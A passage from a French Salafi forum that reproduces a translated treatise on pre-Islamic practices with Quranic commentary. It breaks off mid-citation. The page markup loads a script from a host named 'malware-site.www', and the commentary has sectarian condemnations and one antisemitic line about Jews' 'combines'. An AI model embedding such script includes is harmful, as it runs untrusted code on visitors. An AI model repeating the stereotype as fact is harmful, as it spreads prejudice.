ISLAM SUIVANT LE CORAN ET LA SUNNA

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<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

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ISLAM SUIVANT NOS EMINENTS SAVANTS

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Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
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    Question du paganisme de l'anté-Islam désapprouvées par le Messager d'Allah (prières et bénédictions d’Allah sur lui)2

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    assalafia
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    Question du paganisme de l'anté-Islam désapprouvées par le Messager d'Allah (prières et bénédictions d’Allah sur lui)2

    Message par assalafia le Dim 4 Jan - 13:33

    Surprised
     Rédigées par l’Imam, le Cheikh de l’Islam Mohammed Ibn ‘Abdel Wahab.
    Développé par le Cheikh de l’Irak Mahmoud Choukrî Al-Aloussi.
     Traduit en langue française par Mahmoud Moujahid et complètement revue par Al Intisar
     
      
     
    Question n°18:
    Le Reniement de la vérité qui n'est pas reconnue par leur communauté
    Question n°19:
    Leur attachement aux mythes de la magie
    Question n°20:
    La Contraction de leur appartenance
    Question n°21:
    Le détournement des textes, de leurs significations
    Question n°22:
    L'altération des livres de la religion
    Question n°23:
    L'abandon de la guidée de la religion, et l'adoption de ce qui lui contrevient
    Question n°24:
    La mécréance à l'égard de la vérité détenue par autrui
    Question n°25
    La prétention de chaque secte de détenir la vérité, en exclusivité
    Question n°26:
    Le reniement de ce qu'ils avaient admis comme étant de leur religion
    Question n°27:
    Le dévoilement volontaire des parties intimes
    Question n°28:
    La pratique du culte tout en interdisant tes choses licites
    Question n°29:
    Le blasphème dans les noms du Seigneur, pureté à Lui, et dans Ses attributs
    Question n°30:
    L'attribution des imperfections au Seigneur, pureté à Lui
    Question n°31:
    L'exemption de l'être créé de ce qu'ils attribuaient au créateur
    Question n°32:
    Leur non croyance à la création
     
     
     
     
     
    Question n°18:
    Le Reniement de la vérité qui n'est pas reconnue par leur communauté
    Une des caractéristiques des païens de l'anté-islam était de n'admettre que la "vérité" adoptée par leur communauté. Allah, le Très Haut, a dit dans la Sourate "La Génisse" - Verset 91:
    "Et quand on leur dit: "Croyez à ce qu'Allah a fait descendre", ils disent: "Nous croyons à ce qu'on a fait descendre à nous". Et ils rejettent le reste, alors qu'il est la vérité confirmant ce qu'il y avait déjà avec eux. - Dis: "Pourquoi donc avez-vous tué auparavant les prophètes d'Allah, si vous étiez croyants?" Ce verset signifie:
    Nous continuons la croyance en la Thora, en ce qui y est prescrit et descendu à nous, parmi ses commandements arrêtés par décision. "A nous", le pronom, pourrait s'appli­quer à eux-mêmes mais aussi aux prophètes des fils d'Israël, selon ce que laisse supposer le verset. Il y a là allusion faite à leur mécréance à l'égard du Qur’an, dictée par le despotisme et l'envie par suite de sa révélation à quelqu'un n'appartenant pas à leur communauté.
    Le sens de sa "descente à eux" est leur charge d'appliquer ce que contient "l'objet descendu" comme prescriptions. Ils ont été réprimandés à propos de cela à cause de leur hostilité envers le Qur’an. Les combines des Juifs étant renommées. Et parce qu'ils ont interprété à leur profit la recommandation générale, dans l'absolu, et l'ont dégradée par rapport au cas particulier, à savoir la croyance à ce qui fut descendu à eux.
    Ainsi qu'ils en avaient pris l'habitude, d'interpréter le Livre autrement que par le sens visé.
    "Et ils rejettent le reste alors qu'il est le vérité", c'est-à-dire, ils avaient vérifié sa véracité, donc ils en étaient conscients, "confirmant ce qu'il y avait déjà avec eux." Car les Livres révélés du Seigneur se confirment les uns les autres, et cette confirmation est indispensable et ne varie guère. Ils renfer­ment tous la notion de bien et incitent à le suivre, et c'est pour cela qu'on y relève la réponse à leur parole: "Nous croyons à ce qu'on nous a fait descendre à nous".
    Cependant quiconque ne confirme pas ce qui est en parfait accord avec la Thora, ne la confirme pas pour autant.
    "Dis: "Pourquoi donc avez-vous tué auparavant les prophètes d'Allah, si vous étiez croyants?" Ordre est donné au Prophète (Saluts et Bénédictions d'Allah sur lui) de leur dire cela pour les réprimander pour avoir tué les Prophètes tout en prétendant la croyance à la Thora, alors que celle-ci ne le tolère pas.
     
    Question n°19:
    Leur attachement aux mythes de la magie
    II était de leur propre intérêt de chercher la compensation du Livre Saint du Seigneur, par les livres de la magie; comme l'a dit Allah, le Très Haut, dans la Sourate "La Génisse" - Versets 101 et 102:
    "Et quand leur vint d'Allah un messager confirmant ce qu'il y avait déjà avec eux, certains à qui le Livre avait été donné, jetèrent derrière leur dos le Livre d'Allah comme s'ils ne savaient pas! Et ils suivirent ce que les diables racontent contre le règne de Soulayman. Alors que Soulayman n'a jamais été mécréant mais bien les diables: ils enseignent aux gens la magie ainsi que ce qui est descendu aux deux anges Harout et Marout, à Babylone; mais ceux-ci n'enseignaient rien à personne, qu'ils n'aient dit d'abord: "Nous ne sommes rien qu'une tentation: ne sois pas mécréants"; ils apprennent auprès d'eux ce qui sème la désunion entre l'homme et son épouse. Or ils ne sont capables de nuire à personne qu'avec la permission d'Allah. Et les gens apprennent ce qui leur nuit et ne leur est pas profitable. Et ils savent, très certainement, qui celui qui acquiert [ce pouvoir] n'aura aucune part dans l'au-delà. Certes, quelle détestable marchandise pour la­quelle ils ont vendu leurs âmes! Si seulement ils savaient!"
    La référence à ces versets est très connue, dans les ouvrages d'explication du Qur’an. Cette caractéristique païenne existe encore de nos jours, chez beaucoup de gens, surtout chez ceux qui se réclament des gens de vertu, alors qu'ils en sont très loin. Ceux-ci donc qui s'exercent à la magie, telle le charme des serpents, la géomancie, la pénétration dans le feu, ainsi de suite, parmi les agissements que la législation incite à rendre vains. Ils ont donc tourné le dos, et renié le Livre du Seigneur pour suivre ce que leur ont jeté leurs diables, et prétendre qu'il s'agit-là d'actes bénis. Or les actions bénies n'émanent jamais d'un immoral, et l'immoralité de ceux qui s'adonnent à des actes pareils, est absolument évidente, car ils font de leur religion un jeu et une distraction. Leur exemple est formulé par Allah, le Très haut, dans la Sourate La Caverne - Verset 104:
    "Ceux dont l'effort, dans la vie présente, s'est égare, alors qu'ils s'imaginent faire le bien."
     
    Question n°20:
    La Contraction de leur appartenance
    Ils font preuve, dans leur généalogie, d'une contradiction flagrante, en se réclamant de l'islam et de la descendance d'Ibrahim, Paix sur lui, alors qu'en fait, ils délaissent sa guidée et ils se joignent à d'autres.
     
    Question n°21:
    Le détournement des textes, de leurs significations
    II s'agit là, de l'altération réfléchie de la parole du Seigneur après avoir su sa véritable signification. En cette époque combien de leurs semblables, voit-on, qui détournent les textes et les interprètent selon leurs désirs et leurs passions.
     
    Question n°22:
    L'altération des livres de la religion
    C'est la dénaturation par les savants des livres révélés. Allah, le Très Haut a dit dans la Sourate "La Génisse" - Versets 78 et 79:
    "Et il y a parmi eux des illettrés qui ne savent rien du Livre hormis des prétentions et ils ne font que des conjectures. Malheur, donc, à ceux qui de leurs propres mains compo­sent un livre puis le présentent comme venant d'Allah pour en tirer un vil profit! Malheur à eux, donc, à cause de ce que leurs mains ont écrit, et malheur à eux à cause de ce qu'ils en profitent!"
    Celui qui considère, en cette époque, cornent les juges jonglent avec les jugements, et interprètent les textes selon leur propres désirs, par la déformation de la vérité et son invalidation, moyennant quelque corruption, etc. découvre une mer sans rivages. Il en est de même pour certains innovateurs, ainsi que ceux qui exagèrent "le culte" des morts dans les tombes, dont le cas a été précisé ailleurs.
     
    Question n°23:
    L'abandon de la guidée de la religion, et l'adoption de ce qui lui contrevient
    C'est la question la plus étonnante parmi les caractères étudiés, à savoir la plus forte hostilité déclarée envers la religion à laquelle ils appartenaient, et leur loyalisme total à la lignée des mécréants qui s'en étaient écartés. Et lorsque le Prophète (Saluts et Bénédictions d'Allah sur lui), est venu à eux, avec la religion de Moïse, ils ont préféré suivre les livres de la magie et pratiquer ainsi le culte de Pharaon et des siens. Les exemples de ceux-ci, dans la nation islamique, sont nombreux, beaucoup ont fui la Sunnah (tradition du Prophète), se sont rendus hostiles à elle, et ont soutenu les paroles des philosophes et leurs théories.
     
    Question n°24:
    La mécréance à l'égard de la vérité détenue par autrui
    Lorsque les païens se sont divisés, chaque secte parmi eux n'admettait que la vérité approuvée par les membres de leur clan et mécroyait toute vérité détenue par les autres. Allah, le Très Haut, a dit dans la Sourate "La Vache" - Verset 113:
    "Et les Juifs disent: "Les Chrétiens ne tiennent sur rien"; et les Chrétiens disent: "Les Juifs ne tiennent sur rien", alors qu'ils lisent le Livre! De même ceux qui ne savent rien tiennent un langage semblable au leur. Eh bien, Allah jugera sur ce quoi ils s'opposent, au Jour de la Résurrec­tion."
    C'est là, sans doute, une des caractéristiques du paganisme, qu'on relève de nos jours chez de nombreuses gens, qui n'admettent que leur propre vérité; surtout les adeptes des doctrines qui considèrent qu'ils sont les seuls à pratiquer la religion comme il se doit, à l'exclusion des autres.
    Il est plus raisonnable de considérer la preuve; car ce qui est basé sur la preuve est bien la vérité digne d'être acceptée, tandis que ce qui n'est fondé ni sur des faits ni sur la preuve évidente ne peut qu'être rejeté. N'importe quelle parole, peut être, prise en considération ou bien être refusée, sauf celle qui provient de celui que le Seigneur a choisi pour faire parvenir Son message.
     
    Question n°25
    La prétention de chaque secte de détenir la vérité, en exclusivité
    Lorsqu'ils ont entendu sa parole (Saluts et Bénédictions d'Allah sur lui) dans son hadith à propos des sectes: "Ma nation sera divisée en 73 sectes, toutes seront dans le feu, à l'exception d'une seule!" Chacune des sectes avait alors prétendu être celle qui sera sauvée, conformément à ce qu'Allah, le Très Haut, a dit à propos des Juifs et des Nazaréens dans la Sourate "La Génisse" -Verset 113:
    "Et les Juifs disent: "Les Chrétiens ne tiennent sur rien"; et les Chrétiens disent: "Les Juifs ne tiennent sur rien".
    Le Prophète (Saluts et Bénédictions d'Allah sur lui) avait pourtant précisé, à la fin du hadith, la secte qui sera sauvée: "Ce sont ceux qui seront sur ma guidée et la guidée de mes compagnons". Allah, le Très Haut, en guise de réponse dans la Sourate "La Génisse" -Versets 111 et 112 a dit:
    "Et ils ont dit: "Nul n'entrera au Paradis que Juifs ou Chrétiens". Voilà leurs chimères. - Dis: "Apportez votre preuve, si vous êtes véridiques". Non, mais quiconque soumet à Allah son être tout en faisant le bien, aura sa rétribution auprès de son Seigneur. Pour eux, nulle crainte, et ils ne seront point attristés."
    Ce qui démontre bien qu'ils n'avaient aucune preuve de la véracité de leur prédiction, et c'est bien là la preuve qui infirme leur parole: Aboul 'Abbas Taqiyouddine a parlé du hadith des sectes dans son ouvrage "La voie de la Sunnah" de façon suffisamment détaillée. "Arrafidhi (Arrafidhi; celui qui s'oppose à la pensée sunnite) l'a cité pour affirmer la droiture à sa doctrine et pour invalider celle des adeptes de la Sunnah; (à consulter au besoin(L'ouvrage intitulé "La voie de la Sunnah" est agrémenté par de précieux commentaires à propos de ce qui en était résumé par Al-Hafiz  Ad Dhahabî qu'il  a  appelé  "Précis  de  la voie  de la modération". Edité en 1374. (H)).
     
    Question n°26:
    Le reniement de ce qu'ils avaient admis comme étant de leur religion
    Ils ont renié ce qu'ils avaient admis comme faisant partie de leur religion, tel le grand pèlerinage à la Maison du Seigneur. Ils pratiquaient leur culte tout en reniant ce rite, et en reconnaissant à la fois qu'il en fait partie. Ainsi que l'a dit le Très Haut, dans la Sourate "La  Génisse" - Verset 125:
    "[Et rappelle-toi], quand nous fîmes de la Maison un lieu de visite et un asile pour les gens - Adoptez donc pour lieu de prière, ce lieu où Abraham se tint debout" jusqu'à ce qu'il ait dit dans les versets 130 à 132:
    "Qui donc aura en aversion la religion d'Abraham, sinon celui qui sème son âme dans la sottise? Car très certaine­ment Nous l'avons choisi en ce monde; et, dans l'au-delà, il est certes du nombre des gens de bien. Quand son Seigneur lui avait dit: "Soumets-toi", il dit: "Je me soumets au Seigneur de l'Univers". Et c'est ce qu'Abraham recommanda à ses fils, de même que Jacob: "O mes fils, certes Allah vous a choisi la religion: ne mourrez point, donc, autrement qu'en Soumis"! (À Allah)."
    On estime que le motif de descente de l'expression "Qui donc aura en aversion" etc., était ce qu'on rapportait que 'Abdoullah Ibnou Salam a appelé ses deux neveux Salamah et Mouhajar à adopter l'Islam en disant: "Vous savez déjà que le Seigneur Très Haut dans la Thora a dit: j'enverrai parmi les fils d'Ismaël un Prophète nommé Ahmad. Quiconque y croit sera sage et bien guidé, et celui qui ne croit pas en lui sera maudit.
    Dès lors, Salamah se convertit à l'Islam alors que Mouhajar le refusa et le verset fut révélé.
     
    Question n°27:
    Le dévoilement volontaire des parties intimes
    Est le fait de laisser les parties intimes du corps découvertes volontairement. Le Seigneur, Très Haut a dit dans la Sourate "Al-A’raf" - Versets 28 et 29:
    "Et quand ceux-ci commettent une turpitude, ils disent: "C'est une coutume léguée par nos ancêtres et prescrite par Allah." Dis: "[Non,] Allah ne commande point la turpi­tude. Direz-vous contre Allah ce que vous ne savez pas?" Dis: "Mon Seigneur a commandé l'équité. Que votre prosternation soit exclusivement pour Lui. Et invoquez-Le, sincère dans votre culte. De même qu'il vous a créés, vous retournerez à Lui."
    Certains expliquent la turpitude ici, par l'acte extrêmement abhorré, celui de l'adoration des idoles, par le dévoilement volontaire des parties intimes du corps au cours de la procession autour, de la Ka’bah et par des agissements semblables.
    "Al Farraou" estime que cette expression vise exclusive­ment le dévoilement du sexe. Dans ce verset il y a une expression sous entendue qui revient à dire: Quand ils commettaient une turpitude, et qu'on tentait de la leur interdire, ils disaient: nous y avons trouvé nos ancêtres et c'est Dieu qui nous l'a commandée d'où l'imitation des ancêtres, et la calomnie sur Dieu. Il était de la tradition des "Homs" de ne pas sortir, en période de pèlerinage, vers ‘Arafat, mais de se contenter de stationner à Muzdalifah. Ils ne mangeaient ni beurre ni fromage, ils n'attachaient ni chèvre ni vache; ils ne filaient ni laine, ni poils de chameau et ne pénétraient pas sous les tentes.
    Ils s'abritaient sous des coupoles rouges pendant les mois sacrés; par la suite, ils ont obligé tous les arabes à se défaire de leurs provisions habituelles quand ils pénétraient en zone sacrée et à quitter leurs vêtements spécifiques à la zone sacrée; pour cela il fallait soit en acheter; soit en emprunter ou les recevoir en cadeau, faute de quoi ils devaient s'avancer complètement déshabillés et faire la procession autour de la Maison dans cette tenue. Ils obligeaient les femmes arabes à agir de même; alors qu'habituellement la femme faisait sa procession dans un habit échancré aux jambes et par derrière.
    Une femme a dit, (il s'agit de Dhaba'a Bint'Amir Ibn Sa'asaata,) en faisant sa procession autour de la Maison: "Aujourd'hui il en apparaît un partie ou le tout - et ce qui en parait, je ne l'autoriserai pas."
    Ils ont chargé les arabes de procéder au déferlement à partir de Muzdalifah, alors qu'auparavant ils le faisaient de ‘Arafat. Ainsi que d'autres "manies" qu'ils se sont fabriquées et rendues légitimes, sans que cela ne soit autorisé par le Seigneur; et le comble est qu'ils prétendaient obéir à la loi de leur père Abraham (Paix sur lui). Tout cela n'était bien sûr que la conséquence de leur paganisme.
    La plupart de ceux qui appartiennent à l'Islam, aujourd'hui, ont innové dans la religion ce que le Seigneur n'a pas permis:
    Certains d'entre eux font, des instruments de musique, et des moyens de distraction, une forme d'adoration qu'ils prati­quent dans les mosquées et les lieux de prières. D'autres font la procession autour des tombes, du déplacement vers ces lieux, et des voeux, leur adoration la plus fidèle, et leur acte de rapprochement le plus méritoire.
    D'autres ont crée la congrégation, l'ordre religieux et les ruses diaboliques, prétendant qu'ils étaient sur le sentier des ascètes et sur le chemin des adorateurs, alors que leur but suprême était de satisfaire leurs désirs bestiaux et de réussir à jouir des plaisirs dans ce bas monde. Il existe bien d'autres cas qui seraient très longs à citer et sans signification logique.
    Nous nous contenterons de dire: "Au créditeur du jour de la résurrection nous nous dirigeons, et c'est chez le Seigneur que se rencontrent les adversaires."
     
    Question n°28:
    La pratique du culte tout en interdisant tes choses licites
    Ils pratiquaient leur culte en s'interdisant les choses licites. Le Seigneur leur a refusé cela par Sa parole dans la Sourate "Al-A'raf" - Versets 31 à 33:
    "Ô enfants d'Adam, dans chaque lieu de Salât portez votre parure (vos habits). Et mangez et buvez; et ne commettez pas d'excès, car II [Allah] n'aime pas ceux qui commettent des excès.
    Dis: "Qui a interdit la parure d'Allah, qu'il a produite pour Ses serviteurs, ainsi que les bonnes nourritures?" Dis: "Elles sont destinées à ceux qui ont la foi, dans cette vie, et exclusivement à eux au Jour de la Résurrection." Ainsi exposons-Nous clairement les versets pour les gens qui savent.
    Dis: "Mon Seigneur n'a interdit que les turpitudes (les grands péchés), tant apparentes que secrètes, de même que le péché, l'agression sans droit et d'associer à Allah ce dont II n'a fait descendre aucune preuve, et de dire sur Allah ce que vous ne savez pas."
    Le sens de ces versets: "Ô enfants d'Adam, dans chaque lieu de Salât portez votre parure" c'est-à-dire vos vêtements qui cachent les parties intimes de votre corps lors de votre procession (autour de la Ka’bah) et à chaque office de prière. La cause de la révélation le fait que certains bédouins faisaient la procession autour de la Maison, complètement déshabillés, au point que la femme, s'accrochait des rubans autour de sa taille, pour se cacher les parties sexuelles et disait:
    "Aujourd'hui il en apparaît une partie ou le tout, Et ce qui en apparaît, je ne le permettrai pas".
    Alors, le Seigneur Tout Haut a fait descendre ce verset: "Et mangez et Buvez". Al-Kalbi a dit: à l'époque de l'anté-islam les gens mangeaient sans excès, ils ne mangeaient pas de mets gras les jours du pèlerinage, pour encore mieux Le glorifier.
    Alors les musulmans ont dit: "O Envoyé d'Allah! Nous sommes plus dignes d'une telle pratique. Aussitôt le Seigneur, Tout Haut, a révélé le verset à travers lequel il y a lieu de noter la pertinence de la citation de la nourriture et de la boisson: "Et ne commettez pas d'excès." par l'interdiction des choses licites, et cela est conforme au motif de la descente: "Il [Allah] n'aime pas ceux qui commettent des excès." bien au contraire II les déteste et désapprouve leurs agissements.
    "Dis qui a interdit la parure d'Allah, qu'il a produite pour Ses esclaves" parmi les vêtements et tout ce dont on se pare et qu'Il a créé pour qu'ils en tirent profit comme les habits en produits d'origine végétale tel le coton, le lin (chanvre) ou d'origine animale comme la soie et la laine.
    "Ainsi que les bonnes nourritures" c'est-à-dire les plus délicieuses - licites dit-on - d'entre les nourritures et les boissons, comme la viande de mouton, sa graisse et son lait.
    "Dis: "Elles sont destinées a ceux qui ont la foi dans cette vie," c'est-à-dire, essentiellement pour eux, comme preuve de leur faveur auprès du Seigneur le Tout Haut; Quant aux mécréants qui s'associent à eux dans cela, ce n'est que par le fait d'en faire autant et aucune autre faveur ne leur est accordée: pas d'équivoque donc, quant à l'exclusivité.
    "Exclusivement à eux au jour de la Résurrection", c'est-à-dire sans que d'autres ne s'associent à eux.
    "Ainsi exposons-Nous clairement les versets pour les gens qui savent." C'est-à-dire de la façon dont nous avons détaillé cette loi, nous précisons la plupart des lois pour celui qui sait accéder aux sens limpides qu'elles contiennent.
    "Dis: "Mon Seigneur n'a interdit que les turpitudes (les grands péchés)." Ce sont les désobéissances dont la répugn­ance est croissante, y compris ce qui a trait au sexe.
    "Tant apparentes que secrètes", c'est-à-dire ce qui en est apparent,  comme  ce  qui en est secret, allusion faite à l'adultère flagrant et l'adultère secret, car les gens répugnaient à faire le premier et commettaient sans gêne le second; alors ordre absolu leur a été donné pour ne plus s'adonner ni à l'un ni à l'autre.
    Selon Moujahid, "tant apparentes" désigne le nu flagrant lors de la procession, et "que secrètes" c'est l'adultère. Certains ont dit: le premier, c'est la procession des hommes nus pendant le jour, et le second c'est la procession des femmes déshabillées, la nuit.
    "Et le péché" signifie tout ce qui y mène et essentiellement la médisance, et tout ce qui conduit aux turpitudes.
    D'autres ont estimé que le "Péché" signifiait l'alcool, en accord avec les linguistes, et en se référant à cette parole du poète:
    - l'Envoyé d'Allah (Saluts et bénédictions d'Allah sur lui) nous a interdit d'approcher l'adultère et de boire "le péché" qui engendre le fardeau (les fautes); et la parole d'un autre:
    - "J'ai bu "le péché" au point de perdre ma conscience. Ainsi le péché s'empare des esprits."
    "L’agression sans droit", c'est la prévarication et l'empiéte­ment sur les droits des gens, cela a été cité isolément, compte tenu de la généralisation dans ce qui précède ou de son appartenance au domaine des turpitudes rigoureusement réprimées.
    "Et d'associer à Allah ce dont II n'a fait descendre aucune preuve, et de dire sur Allah ce que vous ne savez pas." Par le biais du blasphème dans Ses attributs et de la calomnie sur Lui, telle leur parole citée dans la Sourate "Al-A'raf" - Verset 28:
    "Et prescrite par Allah."
    II est évident qui les mystiques de notre époque sont dans cette situation païenne, car ils se sont interdit la parure autorisée par le Seigneur, et les excellentes nourritures, pour faire croire aux autres qu'ils sont plus vertueux. Puis ils se sont inventés des pratiques spécifiques telles que l'isolement, les sports et autres rites concernant la nourriture, l'habillement et la plupart des affaires du quotidien, ignorant que par là ils s'engagent dans la voie des peuples dont l'effort s'est égaré dans ce bas monde, alors qu'ils croyaient bien faire.
     
    Question n°29:
    Le blasphème dans les noms du Seigneur, pureté à Lui, et dans Ses attributs
    C'est le blasphème dans Ses noms et Ses attributs. Le Seigneur, pureté à Lui, a dit dans la Sourate "Al-A'raf -Verset 180:
    "C'est à Allah qu'appartiennent les noms les plus beaux. Invoquez-Le par ces noms et laissez ceux qui profanent Ses noms: ils seront rétribués pour ce qu'ils ont fait."
    L'explication de ce verset: "C'est à Allah qu'appartiennent les Noms les plus beaux" est l'avertissement des croyants, quant à la façon de Son rappel, qu'Il soit exalté, et la manière d'agir avec ceux qui ne sont pas assidus à cela et qui en sont distraits, pureté à Lui, ignorant ce qu'Il mérite, par suite de leur inconscience totale et de leur égarement malheureux.
    "Invoquez-le par ces noms" soit dans le sens de l'appel, la dénomination, comme l'on dit: Je l'ai appelé Zayd ou Yazîd, pour dire je l'ai nommé, ou bien dans le sens de l'invocation et du rappel tel que l'on dit: J'ai appelé Zayd, c'est-à-dire "interpellé".
    "Et laissez ceux qui profanent Ses noms", c'est-à-dire qui se détournent et s'écartent de la vérité, vers ce qui est vain: on dit de quelqu'un: II a "blasphémé" lorsqu'il s'est écarté du but visé et de la droiture.
    Le blasphème dans Ses noms, pureté à Lui, consiste à Le nommer par ce dont II n'a pas décrété, ou bien par ce qui laisse entendre un sens déficient: Comme c'était le cas chez les bédouins qui disaient: "O père des générosités. . . O celui dont le visage est blanc, etc." On entend par délaisse­ment de ce qui est recommandé, le fait d'éviter d'en faire et par "Ses noms", les dénominations qu'il lui ont attribuées, qu'Il soit élevé, et non Ses véritables beaux noms.
    Le Seigneur Très Haut a dit dans la sourate "Le Tonnerre" -Verset 30:
    "Ainsi Nous t'envoyons dans une communauté - que d'autres communautés ont précédée - pour que tu leur récites ce que Nous te révélons [le Coran], cependant qu'ils ne croient pas au Tout Miséricordieux. Dis: "C'est Lui mon Seigneur. Pas d'autre divinité à part Lui. En Lui je place ma confiance. Et à Lui je me repens."
    D'après Qoutadah, Ibnou Jourayj et Mouqatil, le verset fut révélé au sujet des païens de la Mecque, lorsqu'ils ont vu le traité du pacte de Houdaybiyah, dans lequel ‘Ali, qu'Allah soit satisfait de lui, a écrit: "Au nom d'Allah le Très Miséricordieux, le Tout Miséricordieux", alors Souhayl Ibnou 'Amr dit: Nous ne connaissons de très miséricordieux que Moussaylimah."
    Certains on dit: Abou-Jahl a entendu la parole de l'envoyé d'Allah (Saluts et bénédictions d'Allah sur lui) :  "O Allah, O le Très miséricordieux !" Alors il dit: "Muhammad nous interdit l'adoration de plusieurs dieux, alors qu'il en adore deux." Le verset fut aussitôt révélé.
    Et selon certains, lorsqu'on a dit aux mécréants de Qoraysh: "Prosternez-vous pour le Très Miséricordieux", ils dirent: "Qu'est ce que le Très Miséricordieux ?" et le verset fut alors révélé en réponse à leur question? Certains estiment que d'autres circonstances, qu'il serait long d'énumérer, ont été à l'origine de ce verset.
    Le Seigneur, Très Haut a dit:
    "Ils diront à leurs peaux: "Pourquoi avez-vous témoigné contre nous?" Elles diront: "C'est Allah qui nous a fait parler, Lui qui fait parler toute chose. C'est Lui qui vous a créés une première fois et c'est vers Lui que vous serez retournés".
    Vous ne pouviez vous cacher au point que ni vote ouïe, ni vos yeux et ni vos peaux ne puissent témoigner contre vous. Mais vous pensiez qu'Allah ne savait pas beaucoup de ce que vous faisiez.
    Et c'est cette pensée que vous avez eue de votre Seigneur, qui vous a ruinés, de sorte que vous êtes devenus du nombre des perdants."
    Sourate "Les Versets Détaillés" - Versets 21 à 23.
     
    Dans ce verset, on relève l'information que les païens blasphémaient dans les attributs d'Allah, comme ils le faisaient dans Ses noms, qu'Il soit exalté.
    Ahmad, Al Boukhari, Mouslim, At-Tirmidhi, An-Nassa-i et Jamâ'a rapportent que Ibnou Mass'oud a dit: " Alors que j'étais appuyé contre les rideaux de la Ka’bah, un trio vint, formé d'un homme de Qoraysh et de deux de Thakif - ou de deux hommes de Qoraysh et d'un homme de Thakif - opulents et ventrus, mais non perspicaces; ils ont parlé de choses que je n'ai pas entendues puis l'un d'eux a dit: "Vous pensez que le Seigneur entend nos paroles que voici ?" L'autre a dit: "Si nous élevons la voix, Il nous entendra, sinon II n'entendra pas". Alors le troisième a dit: "S'il en entend une partie, II entend le tout!" Ensuite, J'ai rapporté cette conversation au Prophète (Saluts et bénédictions d'Allah sur lui). Alors le Seigneur Tout Haut a révélé:
    "Vous ne pouviez vous cacher au point que ni votre ouïe, ni vos yeux et ni vos peaux ne puissent témoigner contre vous. Mais vous pensiez qu'Allah ne savait pas beaucoup de ce que vous faisiez." Etc.
    Ceci, donc, est le blasphème dans les qualificatifs attribués au Seigneur et l'on sait que la plupart des théologiens qui en parlent, sont dans une situation de blasphème à l'égard des Noms et des Attributs, pire que celle qu'ont connue les païens, du fait qu'ils aient assigné au Seigneur des noms inventés n'ayant aucun fondement.
    Il y en a qui disaient: Allah n'a pas d'attributs dépendants de Lui, et d'autres disaient: Ses attributs ne sont pas relatifs à Son entité. Certains disaient: Ses attributs sont distincts de Lui-même; et aussi: Certes le Seigneur n'a pas parlé par le moyen des Livres Saints qu'Il a fait descendre, ils ont démontré qu'il s'agit là de la parole spirituelle, et qu'Il n'a conversé avec aucun de Ses messagers apôtres. . .
    Ainsi que d'autres formes de blasphèmes dont ils ont bourré leurs livres, qu'ils emplissaient de chimères. Ils ont cru que le verset concernait les païens uniquement, sans savoir qu'ils étaient aussi concernés par sa généralité.
    Quiconque alors, doté par le Seigneur Très Haut, de clairvoyance, et d'un coeur illuminé, refuse de fonder sa foi sur le contenu des livres de ces sectes et se doit de recevoir la connaissance de Son Seigneur par le biais des livres des pieux devanciers, contenant des textes issus du Livre Saint et de la Sunnah.
     
    Question n°30:
    L'attribution des imperfections au Seigneur, pureté à Lui
    Est l'attribution des imperfections au Seigneur, pureté à Lui, tel l'enfant et le besoin d'en avoir, car les Nazaréens disaient: "Le Messie est le fils du Seigneur", et une secte parmi les arabes disait: "Les anges sont les filles d'Allah". Un certain nombre de philosophes ont parlé de l'enfantement spirituel. Nombreux étaient les juifs qui disaient "Al 'Ouzayr" est le fils du Seigneur, etc.
    Cependant, le Seigneur S'est déjà innocenté de tout cela et L'a renié par Sa parole, Tout Haut, dans la Sourate (Le Monothéisme Pur) -
    "Dis: "II est Allah, Unique.
    Allah, Le Seul à être imploré pour ce que nous désirons. Il n'a jamais engendré, n'a pas été engendré non plus. Et nul n'est égal à Lui."
    Et dans la Sourate "Les Rangées" - Versets 151 et 152:
    "Certes, ils disent dans leur mensonge: "Allah a engendré"; mais ce sont certainement des men­teurs!"
    Et dans la sourate "Les Bestiaux" - Versets 100 -101:
    "Et ils ont désigné des associés à Allah: les djinns, alors que c'est Lui qui les a créés. Et ils Lui ont inventé, dans leur ignorance, des fils et des filles, Gloire à Lui! Il transcende tout ce qu'ils lui attribuent.
    Créateur des cieux et de la terre. Comment aurait-Il un enfant, quand II n'a pas de compagne? C'est Lui qui a tout créé, et II est Omniscient."
    Ceci englobe toutes sortes d'attributs qu'on a cités à ce sujet chez certains peuples, ainsi que la négation de l'engendrement qui s'étend à toutes sortes d'adoption, conformément à la parole du Seigneur, le Très Haut, dans la Sourate "La Table Servie" - Verset 18:
    "Les Juifs et les Chrétiens ont dit: "Nous sommes le fils d'Allah et Ses préférés." Dis: "Pourquoi donc vous châtie-t-II pour vos péchés?" En fait, vous êtes des êtres humains d'entre ceux qu'Il a créés. Il pardonne à qui Il veut et II châtie qui II veut. Et à Allah seul appartient la royauté des cieux et de la terre et de ce qui se trouve entre les deux. Et c'est vers Lui que sera la destination finale."
    As-Souddi a dit: On dirait que le Seigneur, Très Haut, a révélé à Israël que "tes fils sont certes semblables à tous les autres. Je les ferai entrer dans le feu où ils demeureront quarante jours pour qu'il les purifie et qu'il absorbe leurs fautes, puis un crieur appellera: "Faites sortir tout circoncis d'entre les fils d'Israël."
    Le Seigneur Très Haut, a déjà dit dans la Sourate "Les Croyants" - Verset 91:
